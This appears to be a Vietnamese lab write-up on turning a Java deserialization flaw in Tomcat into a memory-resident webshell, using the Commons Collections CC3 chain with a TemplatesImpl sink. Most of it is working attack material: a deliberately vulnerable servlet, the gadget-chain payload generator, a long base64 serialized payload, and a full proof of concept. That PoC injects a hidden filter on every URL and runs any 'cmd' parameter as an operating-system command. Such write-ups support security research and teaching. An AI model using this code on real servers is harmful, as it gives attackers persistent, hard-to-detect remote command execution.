Deserialize to memshell in Tomcat

Sau khi hiểu cơ bản cách triển khai memshell thông qua JSP, ta tiếp tục tìm hiểu đến kỹ thuật leo memshell thông qua lỗ hổng deserialize.

1. Preface

Hiện tại theo như mình tìm hiểu thì ta chỉ có thể leo lên memshell thông qua deser của một số chain dùng sink TemplatesImpl như CommonsBeanutils1, CC2, CC3, CC4 vì TemplatesImpl cho phép ta load được byte code của class bất kỳ vào quá trình Runtime -> Dễ triển khai memshell hơn, do đó trong phần này mình chỉ note về deser2memshell với sink TemplatesImpl. Do đó để hiểu rõ hơn mình khuyên các bạn nên nắm rõ cách sink TemplatesImpl hoạt động với một số chain như CommonsBeanutils1 hoặc CC3 (Tham khảo chi tiết bài này)

Môi trường lab trong bài này sẽ là jdk8u66 với commons-collections 3.2.1, ta sẽ demo leo memshell với chain CC3

2. Setup labs

Ta sẽ có một trang web servlet đơn giản để demo như sau

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.util.Base64;


@WebServlet("/")
public class DeserLab extends HttpServlet {
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        byte[] data = Base64.getDecoder().decode(req.getParameter("data"));
        ByteArrayInputStream inputStream = new ByteArrayInputStream(data);
        ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        try {
            System.out.println(objectInputStream.readObject());
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
    }
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doPost(req,resp);
    }
}

Mình dùng chain CC3 như sau để exploit

import java.io.*;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
import javassist.ClassPool;
import org.apache.commons.collections.map.LazyMap;

import java.util.Base64;

public class CC3 {

    private static String serTest(Object obj) throws Exception {
        ByteArrayOutputStream bArr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bArr);
        oos.writeObject(obj);
        oos.close();

        byte[] bytes = bArr.toByteArray();
        return Base64.getEncoder().encodeToString(bytes);
    }
    private static void deserTest(String input) throws Exception {
        byte[] bArr = Base64.getDecoder().decode(input);
        InputStream is = new  ByteArrayInputStream(bArr);
        ObjectInputStream ois = new ObjectInputStream(is);
        ois.readObject();
        ois.close();
    }
    private static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {

        byte[] bArr = ClassPool.getDefault().get(<Class_Wanna_Load>.class.getName()).toBytecode();
        TemplatesImpl tplsImpl = new TemplatesImpl();
        setFieldValue(tplsImpl, "_bytecodes", new byte[][]{bArr});
        setFieldValue(tplsImpl, "_name", "ahihi");
        setFieldValue(tplsImpl, "_tfactory", new TransformerFactoryImpl());

        ConstantTransformer constTransformer = new ConstantTransformer(TrAXFilter.class);
        InstantiateTransformer insTransformer = new InstantiateTransformer(new Class[]{javax.xml.transform.Templates.class},
                new Object[]{tplsImpl});
        ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{
                constTransformer, insTransformer
        });
        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map, chainedTransformer); // factory#transform()

        Class aInvocationHandlerCls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor aInvocationHandlerConstructor = aInvocationHandlerCls.getDeclaredConstructors()[0];
        aInvocationHandlerConstructor.setAccessible(true);

        InvocationHandler proxyHandler = (InvocationHandler) aInvocationHandlerConstructor.newInstance(Override.class, lazyMap);
        Map proxyMap = (Map) Proxy.newProxyInstance(
                map.getClass().getClassLoader(),
                map.getClass().getInterfaces(),
                proxyHandler
        );
        InvocationHandler aihObj = (InvocationHandler) aInvocationHandlerConstructor.newInstance(Override.class, proxyMap);

        String serialized = serTest(aihObj);
        System.out.println(serialized);
//        deserTest(serialized);
    }
}

3. Phân tích

A. Vấn đề

Nhìn lại các payload load memshell bằng JSP ta sẽ nhận ra để setup malicious Filter/Servlet/Listener ta đều cần dùng đến object requestcó sẵn trong file jsp. Object này là instance của HttpServletRequest. Đối với file JSP thì ta có thể gọi đến object này dễ dàng. Tuy nhiên khi deser lại là một chuyện hoàn toàn khác.

Vấn đề lớn nhất khi muốn leo từ deser là ta không thể gọi trực tiếp đến HttpServletRequest . Do mỗi HttpServletRequest sẽ đại diện cho mỗi request đến từ client nên ta không thể khai báo trực tiếp khi deser được mà phải tìm cách dump từ Runtime.

Để giải quyết các vấn đề trên ta có nhiều phương pháp khác nhau. Tuy nhiên ở bài này mình sẽ tập trung vào phương pháp của @kingkk (bài gốc)

Ngoài ra cũng còn nhiều phương pháp khác mà các bạn có thể tự tham khảo để triển khai. Ví dụ như:

JavaSecs/05-内存马专区/3-反序列化注入内存马/反序列化注入内存马.md at master · Hdys0vn/JavaSecsGitHub

B. Phân thích và khai thác

Note: Để set debug cũng như gen payload exploit cho đơn giản thì ta có thể embed tomcat core vào project (version phải cùng với version tomcat đang sử dụng - mình đang dùng tomcat 9.0.91 nên sẽ embed version 9.0.91 luôn)

Ý tưởng của phương pháp này là sẽ tìm cách get được HttpServletRequest thông qua một property nào đó trong quá trình Runtime gọi đến các components của Tomcat.

Inject ThreadLocal

Như đã biết từ bài trước thì trong quá trình Tomcat handle các Filter thì sẽ gọi đến ApplicationContext.internalDoFilter để thực thi Filter

Sau khi thực hiện doFilter xong thì hàm này còn tiếp tục set giá trị request và response vào lastServicedRequest và lastServicedResponse nếu như ApplicationDispatcher.WRAP_SAME_OBJECT là true

Vậy thì property này là gì? Xem vào phần define property ở đầu class ta có được:

2 property này sẽ là 2 ThreadLocal (khái niệm ThreadLocal) hold request và response khi gọi đến Filter. Tuy nhiên giá trị ApplicationDispatcher.WRAP_SAME_OBJECT mặc định sẽ là false, do đó lastServicedRequest và lastServicedResponse sẽ được set là null.

Trong quá trình Runtime request và response sẽ được gán vào 2 property này nếu như ApplicationDispatcher.WRAP_SAME_OBJECT là true. Lợi dụng hành vi này ta sẽ setup ApplicationDispatcher.WRAP_SAME_OBJECT thành true để Tomcat tự động set request và resposne vào lastServicedRequest và lastServicedResponse. Sau đó ta gán một filter độc hại bằng cách gọi đến lastServicedRequest trong quá trình deserialize

Vì đây là 2 property static final nên ta sẽ dùng Reflection theo cách này để setup giá trị

java.lang.reflect.Field WRAP_SAME_OBJECT_FIELD = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
java.lang.reflect.Field lastServicedResponseField = ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");

java.lang.reflect.Field modifiersField = Field.class.getDeclaredField("modifiers");
modifiersField.setAccessible(true);
modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL);
modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() & ~Modifier.FINAL);
modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() & ~Modifier.FINAL);
WRAP_SAME_OBJECT_FIELD.setAccessible(true);
lastServicedRequestField.setAccessible(true);
lastServicedResponseField.setAccessible(true)

Khi thay đổi giá trị thành công ta có thể gọi đến ServletContext như sau

java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
ThreadLocal threadLocal = (ThreadLocal) lastServicedRequestField.get(null);
ServletRequest servletRequest = (ServletRequest) threadLocal.get();
servletRequest.getServletContext();

Từ ServletContext ta có thể gọi đến StandardContext (tham khảo bài trước). Và từ StandardContext có thể tự do setup memshell theo mong muốn.

Full POC dùng với chain CC3

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.core.ApplicationFilterChain;

import javax.servlet.ServletResponse;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;

public class ThreadLocalInject extends AbstractTranslet {
    static {
        try {
            java.lang.reflect.Field WRAP_SAME_OBJECT_FIELD = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
            java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
            java.lang.reflect.Field lastServicedResponseField = ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");

            java.lang.reflect.Field modifiersField = Field.class.getDeclaredField("modifiers");
            modifiersField.setAccessible(true);
            modifiersField.setInt(WRAP_SAME_OBJECT_FIELD, WRAP_SAME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL);
            modifiersField.setInt(lastServicedRequestField, lastServicedRequestField.getModifiers() & ~Modifier.FINAL);
            modifiersField.setInt(lastServicedResponseField, lastServicedResponseField.getModifiers() & ~Modifier.FINAL);
            WRAP_SAME_OBJECT_FIELD.setAccessible(true);
            lastServicedRequestField.setAccessible(true);
            lastServicedResponseField.setAccessible(true);

            if (!WRAP_SAME_OBJECT_FIELD.getBoolean(null)) {
                WRAP_SAME_OBJECT_FIELD.setBoolean(null, true);
            }

            if (lastServicedRequestField.get(null) == null) {
                lastServicedRequestField.set(null, new ThreadLocal<>());
            }

            if (lastServicedResponseField.get(null) == null) {
                lastServicedResponseField.set(null, new ThreadLocal<>());
            }

            if (lastServicedResponseField.get(null) != null) {
                ThreadLocal threadLocal = (ThreadLocal) lastServicedResponseField.get(null);
                ServletResponse servletResponse = (ServletResponse) threadLocal.get();
                PrintWriter writer = servletResponse.getWriter();
                writer.write("Inject ThreadLocal Successfully!");
                writer.flush();
                writer.close();
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

Gen payload với CC3

public static void main(String[] args) throws Exception {

    byte[] bArr = ClassPool.getDefault().get(ThreadLocalInject.class.getName()).toBytecode();
    TemplatesImpl tplsImpl = new TemplatesImpl();
    setFieldValue(tplsImpl, "_bytecodes", new byte[][]{bArr});
    setFieldValue(tplsImpl, "_name", "ahihi");
    setFieldValue(tplsImpl, "_tfactory", new TransformerFactoryImpl());

    ConstantTransformer constTransformer = new ConstantTransformer(TrAXFilter.class);
    InstantiateTransformer insTransformer = new InstantiateTransformer(new Class[]{javax.xml.transform.Templates.class},
            new Object[]{tplsImpl});
    ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{
            constTransformer, insTransformer
    });
    Map map = new HashMap();
    Map lazyMap = LazyMap.decorate(map, chainedTransformer); // factory#transform()

    Class aInvocationHandlerCls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor aInvocationHandlerConstructor = aInvocationHandlerCls.getDeclaredConstructors()[0];
    aInvocationHandlerConstructor.setAccessible(true);

    InvocationHandler proxyHandler = (InvocationHandler) aInvocationHandlerConstructor.newInstance(Override.class, lazyMap);
    Map proxyMap = (Map) Proxy.newProxyInstance(
            map.getClass().getClassLoader(),
            map.getClass().getInterfaces(),
            proxyHandler
    );
    InvocationHandler aihObj = (InvocationHandler) aInvocationHandlerConstructor.newInstance(Override.class, proxyMap);

    String serialized = serTest(aihObj);
    System.out.println(serialized);
//        deserTest(serialized);
}

Kết quả:

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAMADWphdmEudXRpbC5NYXAAE2phdmEubGFuZy5DbG9uZWFibGUAFGphdmEuaW8uU2VyaWFsaXphYmxleHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3EAfgAAc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnR0ABJMamF2YS9sYW5nL09iamVjdDt4cHZyADdjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UckFYRmlsdGVyAAAAAAAAAAAAAAB4cHNyAD5vcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW5zdGFudGlhdGVUcmFuc2Zvcm1lcjSL9H%2BkhtA7AgACWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3EAfgAYTAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD%2F%2F%2F%2F%2FdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX%2BAYIVOACAAB4cAAAC%2BDK%2Frq%2BAAAANACECgAfAEcIAEgKAEkASggASwoASQBMBwBNCABOCABPBwBQCABRCgAJAFIKAAkAUwcAVAoACQBVCgAJAFYKAAkAVwoACQBYBwBZCgASAEcKAAkAWgoAEgBbBwBcCwAWAF0IAF4KAF8AYAoAXwBhCgBfAGIHAGMKABwAZAcAZQcAZgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATTFRocmVhZExvY2FsSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwBnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAC3RocmVhZExvY2FsAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAWV1JBUF9TQU1FX09CSkVDVF9GSUVMRAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABhsYXN0U2VydmljZWRSZXF1ZXN0RmllbGQBABlsYXN0U2VydmljZWRSZXNwb25zZUZpZWxkAQAObW9kaWZpZXJzRmllbGQBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAUAcAYwEAClNvdXJjZUZpbGUBABZUaHJlYWRMb2NhbEluamVjdC5qYXZhDAAgACEBAC5vcmcuYXBhY2hlLmNhdGFsaW5hLmNvcmUuQXBwbGljYXRpb25EaXNwYXRjaGVyBwBoDABpAGoBABBXUkFQX1NBTUVfT0JKRUNUDABrAGwBAC9vcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25GaWx0ZXJDaGFpbgEAE2xhc3RTZXJ2aWNlZFJlcXVlc3QBABRsYXN0U2VydmljZWRSZXNwb25zZQEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAJbW9kaWZpZXJzDABtAG4MAG8AcAEAGmphdmEvbGFuZy9yZWZsZWN0L01vZGlmaWVyDABxAHIMAHMAdAwAdQB2DAB3AHgBABVqYXZhL2xhbmcvVGhyZWFkTG9jYWwMAHkAegwAdwB7AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UMAHwAfQEAIEluamVjdCBUaHJlYWRMb2NhbCBTdWNjZXNzZnVsbHkhBwB%2BDAB%2FAIAMAIEAIQwAggAhAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAgwAhAQARVGhyZWFkTG9jYWxJbmplY3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAPamF2YS9sYW5nL0NsYXNzAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAxnZXRNb2RpZmllcnMBAAMoKUkBAAZzZXRJbnQBABYoTGphdmEvbGFuZy9PYmplY3Q7SSlWAQAKZ2V0Qm9vbGVhbgEAFShMamF2YS9sYW5nL09iamVjdDspWgEACnNldEJvb2xlYW4BABYoTGphdmEvbGFuZy9PYmplY3Q7WilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gBAAVjbG9zZQEAD3ByaW50U3RhY2tUcmFjZQAhAB4AHwAAAAAABAABACAAIQABACIAAAAvAAEAAQAAAAUqtwABsQAAAAIAIwAAAAYAAQAAAA0AJAAAAAwAAQAAAAUAJQAmAAAAAQAnACgAAgAiAAAAPwAAAAMAAAABsQAAAAIAIwAAAAYAAQAAAD0AJAAAACAAAwAAAAEAJQAmAAAAAAABACkAKgABAAAAAQArACwAAgAtAAAABAABAC4AAQAnAC8AAgAiAAAASQAAAAQAAAABsQAAAAIAIwAAAAYAAQAAAEIAJAAAACoABAAAAAEAJQAmAAAAAAABACkAKgABAAAAAQAwADEAAgAAAAEAMgAzAAMALQAAAAQAAQAuAAgANAAhAAEAIgAAAd0ABAAHAAAA0BICuAADEgS2AAVLEgYSB7YABUwSBhIItgAFTRIJEgq2AAVOLQS2AAstKiq2AAwQ7362AA4tKyu2AAwQ7362AA4tLCy2AAwQ7362AA4qBLYACysEtgALLAS2AAsqAbYAD5oACSoBBLYAECsBtgARxwAPKwG7ABJZtwATtgAULAG2ABHHAA8sAbsAElm3ABO2ABQsAbYAEcYAMSwBtgARwAASOgQZBLYAFcAAFjoFGQW5ABcBADoGGQYSGLYAGRkGtgAaGQa2ABunAAhLKrYAHbEAAQAAAMcAygAcAAMAIwAAAHIAHAAAABMACwAUABMAFQAbABcAIwAYACgAGQA0ABoAQAAbAEwAHABRAB0AVgAeAFsAIABjACEAaQAkAHEAJQB9ACgAhQApAJEALACZAC0AowAuAK0ALwC2ADAAvQAxAMIAMgDHADYAygA0AMsANQDPADcAJAAAAFIACACjACQANQA2AAQArQAaADcAOAAFALYAEQA5ADoABgALALwAOwA8AAAAEwC0AD0APAABABsArAA%2BADwAAgAjAKQAPwA8AAMAywAEAEAAQQAAAEIAAAAjAAb%2FAGkABAcAQwcAQwcAQwcAQwAAExP%2FADUAAAAAQgcARAQAAQBFAAAAAgBGcHQABWFoaWhpcHcBAHh1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA%2FQAAAAAAAAHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB%2BAC0%3D

Trước khi inject:

Tiến hành inject:

Sau khi inject:

Inject Filter

Tiếp theo ta tiến hành inject malicious Filter. Ta sẽ dùng chain ServletContext để gọi đến StandardContext như sau (chain đã nói ở bài trước)

public static ServletContext getServletContext() throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
    java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
    lastServicedRequestField.setAccessible(true);
    ThreadLocal threadLocal = (ThreadLocal) lastServicedRequestField.get(null);
    if(threadLocal!=null && threadLocal.get()!=null){
        ServletRequest servletRequest = (ServletRequest) threadLocal.get();
        return servletRequest.getServletContext();
    }
    return null;
}

Khi có ServletContext thì ta cũng inject malicious Filter như cách đã làm với file JSP. Tuy nhiên có một lưu ý nhỏ là ta sẽ gộp chung malicous Filter và class setup Filter luôn. Tức là class exploit này tự setup chính nó vòa Runtime như một malicous Filter.

Nguyên nhân của việc trên là nếu class setup một malicous Filter khác thì ta phải upload file class của malicous Filter lên server nếu không thì khi deser sẽ quăng ra lỗi ClassNotFound (các bạn debug sẽ dễ hiểu đoạn này hơn). Do đó ta sẽ gộp chung class inject và malicious filter vào chung 1 class.

Full POC kết hợp exploit với CC3

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationFilterChain;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.servlet.*;
import java.lang.reflect.InvocationTargetException;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;

public class TomcatFilterInject extends AbstractTranslet implements Filter {

    static {
        try {
            ServletContext servletContext = getServletContext();
            java.lang.reflect.Field appContextField = servletContext.getClass().getDeclaredField("context");
            appContextField.setAccessible(true);
            ApplicationContext applicationContext = (ApplicationContext) appContextField.get(servletContext);
            java.lang.reflect.Field standardContextField = applicationContext.getClass().getDeclaredField("context");
            standardContextField.setAccessible(true);
            StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);

            TomcatFilterInject filter = new TomcatFilterInject();
            String name = "ShellFilter";
            FilterDef filterDef = new FilterDef();
            filterDef.setFilter(filter);
            filterDef.setFilterName(name);
            filterDef.setFilterClass(filter.getClass().getName());
            standardContext.addFilterDef(filterDef);

            FilterMap filterMap = new FilterMap();
            filterMap.addURLPattern("/*");
            filterMap.setFilterName(name);
            filterMap.setDispatcher(DispatcherType.REQUEST.name());
            standardContext.addFilterMapBefore(filterMap);

            java.lang.reflect.Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            java.util.Map filterConfigs = (java.util.Map) Configs.get(standardContext);

            java.lang.reflect.Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(org.apache.catalina.Context.class, FilterDef.class);
            constructor.setAccessible(true);
            ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
            filterConfigs.put(name, filterConfig);

        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            e.printStackTrace();
        } catch (NoSuchMethodException e) {
            e.printStackTrace();
        } catch (InstantiationException e) {
            e.printStackTrace();
        }
    }
    public static ServletContext getServletContext() throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        java.lang.reflect.Field lastServicedRequestField = ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
        lastServicedRequestField.setAccessible(true);
        ThreadLocal threadLocal = (ThreadLocal) lastServicedRequestField.get(null);
        if(threadLocal!=null && threadLocal.get()!=null){
            ServletRequest servletRequest = (ServletRequest) threadLocal.get();
            return servletRequest.getServletContext();
        }
        return null;
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        String cmd = request.getParameter("cmd");
        response.setContentType("text/html; charset=UTF-8");
        PrintWriter writer = response.getWriter();
        if (cmd != null) {
            try {
                InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();

                java.util.Scanner scanner = new java.util.Scanner(in).useDelimiter("\\A");
                String result = scanner.hasNext()?scanner.next():"";
                scanner.close();
                writer.write(result);
                writer.flush();
                writer.close();
            } catch (IOException e) {
                e.printStackTrace();
            } catch (NullPointerException n) {
                n.printStackTrace();
            }
        }
        chain.doFilter(request, response);
    }
}

Kết quả:

